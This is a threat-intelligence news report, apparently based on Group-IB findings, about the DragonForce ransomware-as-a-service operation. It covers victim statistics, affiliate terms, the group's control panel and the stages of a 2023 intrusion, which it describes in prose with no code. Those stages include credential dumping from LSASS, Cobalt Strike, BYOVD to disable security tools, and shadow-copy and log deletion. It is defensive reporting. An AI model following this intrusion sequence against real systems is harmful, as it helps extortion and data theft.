DragonForce’s RaaS Operation Launches Widespread Attacks with 82 Victims and Counting

The DragonForce ransomware group emerged as a notable threat actor in August 2023, and by June 26, 2024, the gang had launched a Ransomware-as-a-Service (RaaS) affiliate program. According to findings from Group-IB, DragonForce has been linked to two primary ransomware variants, both of which are based on a leaked LockBit 3.0 builder and ContiV3 code. Between their emergence in 2023 and August 2024, DragonForce compromised at least 82 victims across various sectors. The top five targeted sectors include manufacturing (12 attacks), real estate (11), transportation (10), healthcare (6), and commerce & shopping (4). Geographically, the United States has been the most affected, with 43 attacks, followed by 10 attacks in the United Kingdom and 5 in Australia. DragonForce provides affiliates with a payout structure that includes "80% of the ransom proceeds, along with tools for automating attack management." Affiliates are able to customize ransomware samples, adjust encryption settings, disable security features, and personalize ransom notes, demonstrating the flexibility of the RaaS program.

As with many ransomware groups, DragonForce employs a double extortion strategy, which involves encrypting the victim’s data while also exfiltrating sensitive information. They advertise their ransomware services on dark web forums and maintain a Dedicated Leak Site (DLS), where compromised company IDs and account details are publicly shared. Group-IB’s analysis of the DragonForce control panel reveals affiliate capabilities, including tracking compromised entities under a "Clients" section, listing entities published on the DLS, a "Constructor" page to schedule publications, and a configurable ransomware builder.

In a documented DragonForce attack that occurred in September 2023, Group-IB reports that the threat actors gained unauthorized access to a public-facing web server using valid domain credentials. Three separate IP addresses were observed during this access attempt. Once inside, the attackers used PowerShell's hidden invoke-expression command to download a Cobalt Strike beacon, establishing their command and control (C2) infrastructure. The attackers achieved persistence by modifying the Run registry with their SystemBC malware, alongside setting up Windows services and scheduled tasks. For credential theft, they used Mimikatz to extract credentials from LSASS memory. During the reconnaissance phase, the attackers deployed AdFind and a tool named "netscanold.exe" for network scanning. Lateral movement was conducted through Remote Desktop Protocol (RDP) sessions, initiated after gaining initial access to the public-facing web application server, according to Group-IB.

During these RDP sessions, the attackers expanded their activities to other hosts. They utilized the “Bring Your Own Vulnerable Driver” (BYOVD) technique to disable security monitoring tools and response solutions. After the encryption process, they deleted Windows Event Logs to impede forensic investigations. Additionally, the group used anti-analysis techniques inherited from Conti, such as obfuscating strings with ADVobfuscator and resolving APIs through hashed functions, making reverse engineering more difficult. To further cripple system recovery efforts and ensure the success of their ransomware, DragonForce deleted shadow copies using COM objects and WMIC commands, preventing victims from restoring encrypted files from local backups.